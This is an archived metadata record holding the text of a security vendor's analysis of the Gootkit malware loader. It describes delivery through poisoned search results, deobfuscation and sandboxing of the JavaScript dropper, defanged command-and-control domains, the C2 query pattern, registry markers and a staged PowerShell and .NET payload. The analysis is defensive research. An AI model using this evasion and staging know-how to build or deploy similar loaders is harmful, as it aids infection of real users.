{
	"id": "a3731aa1-440b-441f-8b14-a408e6c884e7",
	"created_at": "2026-04-06T00:10:46.133781Z",
	"updated_at": "2026-04-10T03:24:24.330322Z",
	"deleted_at": null,
	"sha1_hash": "2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8",
	"title": "Investigating the Gootkit Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1527408,
	"plain_text": "Investigating the Gootkit Loader\r\nBy By: Marc Lanzendorfer Dec 11, 2020 Read time: 5 min (1384 words)\r\nPublished: 2020-12-11 · Archived: 2026-04-05 18:40:13 UTC\r\nGootkit has been tied to Cobalt Strike as well as other ransomware attacks in the past. Some of these recent\r\nvictims later suffered SunCrypt ransomware attacks, although it is unclear if this was because of the Gootkit threat\r\nactor or if access was sold to other threat actors.\r\nSince October 2020, we saw an increase in the number of Gootkit cases targeting users in Germany. We\r\ninvestigated this development and found that the Gootkit loader was now capable of sophisticated behavior that\r\nenabled it to surreptitiously load itself onto an affected system and make analysis and detection more difficult.\r\nThis capability was used to deploy a DLL file. Gootkit has, in the past, been tied to Cobalt Strike as well as other\r\nransomware attacks. Some of these recent victims later suffered SunCrypt ransomware attacks, although it is\r\nunclear if this was because of the Gootkit threat actor or if access was sold to other threat actors. We've also\r\ndiscovered in recent weeks that the Gootkit loader is being used in combination with REvil/Sodinokibi\r\nransomware.\r\nInfection vector: Malicious search engine results\r\nIn the cases we saw, the Gootkit loader initially arrives via a ZIP archive downloaded from a website. These\r\nmalicious websites can be found in malicious search engine results, like this:\r\nFigure 1. Malicious search engine results\r\nIn this particular instance, fifa manager kostenlos can be translated as fifa manager free. Note that the search term\r\nused can vary significantly; we just used this search term as an example. We have encountered other cases where\r\nthe search terms were Aldi Talk postident coupon and Control Center 4 download.\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 1 of 9\n\nClicking the link leads to a page on a legitimate site; however, the site has been compromised and used to host a\r\nmalicious page. The aforementioned page looks legitimate:\r\nFigure 2. Malicious page\r\nIt is meant to look like a legitimate forum, with a post containing a link to a file relevant to the search engine\r\nquery. This particular link is more sophisticated than it looks, however. Attempting to redownload the same file\r\nfrom the same URL from the same host/machine fails; however, doing so from a different one succeeds, but the\r\ndownloaded file has a different hash than the original file. This suggests that the server generates this file as it is\r\nneeded, uniquely for each download attempt.\r\nAnalysis of the downloaded file\r\nThe downloaded file is a ZIP file that contains a heavily encoded JS file (which shares the same filename as the\r\nZIP file, save for the extension). We were able to use JSNiceopen on a new tab to produce human-readable code:\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 2 of 9\n\nFigure 3. Deobfuscated code\r\nOf interest here is the function “MT71,” which contains a variable with very long content. Trying to run the script\r\nwith online runtimes such as at Ideoneopen on a new tab fails with the following error:\r\nFigure 4. Error message\r\nWhat becomes apparent through the error is what the WScript.Shell object is trying to do:\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 3 of 9\n\nFigure 5. Partially deobfucated and beautified code\r\nA new object is created (“WScript.Shell”), which tries to read the registry key “HKCU\\SOFTWARE\\nTpm\\”. In\r\ncase this registry key does not exist, it performs the following actions:\r\nA key with an empty value will be written at HKCU\\SOFTWARE\\nTpm\r\nThe value of “bE50” will be set to 32\r\nIf the key already exists, the execution of the script will fail since “bE50” is not set. It becomes clear that this key\r\nis being used as a marker to check if the initial loader was already executed on an infected host.\r\nTo sandbox this script, we used malware-jailopen on a new tab from HynekPetrak. A line had to be added to\r\ndefine the variable of bE50 as 32; otherwise, the script will fail (due to the requirement of accessing the registry\r\nkey). \r\nFigure 6. Modified script\r\nThe following command was then used to run the JS file in the jail:\r\nnode jailme.js -c ./config_wscript_only.json --t404 tr_input/fifa.js tr_output/test -o tr_output/fifa_out.json --trace\r\nThis command would return a 404 error whenever the Javascript file sends a request upon execution. It created the\r\nfollowing output files:\r\nFigure 7. Contents of testurls.json, showing URLs that the malicious code tried to access\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 4 of 9\n\nFigure 8. Partial contents of fifa_out.json; contains some interesting artifacts\r\nLooking at the output JSON file shows that the variable “qI27” is an array of three domains:\r\nwww.adpm.com[.]br\r\nwindowp[.]org\r\nwww.ai-tech[.]paris\r\nConverting the whole line of “qI61” into a readable format reveals the following code block:\r\nFigure 9. Contents of the line qI61, showing the connection attempts to one of the three destination\r\ndomains sequentially\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 5 of 9\n\nThe snippet defines the following flow, running the following code against at least one of the URLs stored in\r\nQI27:\r\n1. “Og13” will be set to a random number after the point with a maximum length of 100\r\n2. The local user’s DNS domain is queried\r\n1. if the machine is joined to a domain, “Og13” will have 278146 added at the end\r\n3. A web request to the URL selected in step 1 will be initiated, using sub-parameters\r\n1. search.php?gqhncrqossifzp={the number in the variable of Og13}\r\n4. It checks for the return code of the web request a. if not 200 (okay), the script goes to sleep and then tries\r\nthe next URL.\r\n5. If the web request is 200 (answer received), it stores the response in variable “zI11”\r\n6. It checks whether the response text from the server contains the “Og13” value\r\n1. If it does not, it goes to sleep and then tries the next URL.\r\n7. If the value is in the response, it removes the “Og13” value from “zI11”\r\n8. It replaces a double-digit number in brackets, e.g. (12), with a response from a function using the variable\r\n“KT44”, which is unknown at this stage.\r\n9. It then calls another function “Nm34” (also currently unknown), passing the new “va67” variable on.\r\nWith the above information, we now know that this loader makes a difference between domain and non-domain\r\nhosts (by adding “278146” at the end of the search parameter).\r\nWe can change environmental variables via the wscript.js file. As the malicious script is looking for the\r\nenvironmental variable “UserDNSDomain,” this was added to the configuration; we also changed the default\r\nusername:\r\nFigure 10. Modified script\r\nRerunning the script — after changing the wscript.js parameter to provide a domain — reveals the request of the\r\nfollowing URL:\r\nFigure 11. Requested URL\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 6 of 9\n\nBased on this observation, we can now run jailme.js without the --t404 option, but with the --down=y option. This\r\nallowed us to send the queries and download any requested files. By default, the jailme.js will stop executing the\r\nscript after 60 seconds. The result of the queried URL now includes all three identified domains, shown below and\r\nincluding the responses:\r\nFigure 12. URLs and responses\r\nWhile we received HTTP 200 responses, none of these included the random strings needed for the script to\r\nproceed. This was true using both samples we received. We are unsure why this is the case; all we can say for sure\r\nis that the servers are currently not providing the files to be downloaded by Gootkit if they are analyzed in this\r\nmanner.\r\nRegistry Analysis\r\nWe can use the presence of registry keys known to Gootkit to test if it has been deployed on an affected system.\r\nOn test machines, we were able to verify that the created registry entries were present:\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 7 of 9\n\nFigures 13 - 16. Created registry keys\r\nThe registry values in the last key can be merged into a PowerShell script:\r\nFigure 17. PowerShell script\r\nMost of this script is encoded; decoding it results in the following:\r\nFigure 18. Decoded code\r\nThis code is, by default, loaded into memory. If this code is instead saved to a file, this turns out to be a .NET DLL\r\nfile. (This particular file is detected as Trojan.Win32.DELF.WLDT).\r\nOpening this particular file in a .NET decompiler shows that it also contains more encoded code. Using a similar\r\ntechnique to dump the contents into a file reveals that this is also an executable file. This one is detected as\r\nTrojan.Win32.MALREP.THJBGBO, which we believe is the payload that this loader delivered to the affected\r\nsystem.\r\nConclusions and Trend Micro solutions\r\nThis particular threat highlights the sophistication of today’s malware-delivering loaders. In a system without any\r\nsecurity solutions enabled, there would be barely any sign of the infection, making analysis and removal more\r\ndifficult.\r\nWith the appropriate Trend Micro solutions, the user would have been protected from this threat. Deep Discovery\r\nAnalyzerproducts would have proactively detected the script as a backdoor and classified it as malicious; Apex\r\nOneproducts would also have been capable of blocking the threat once it was executed. \r\nTags\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 8 of 9\n\nSource: https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html"
	],
	"report_names": [
		"investigating-the-gootkit-loader.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.pdf",
		"text": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.txt",
		"img": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.jpg"
	}
}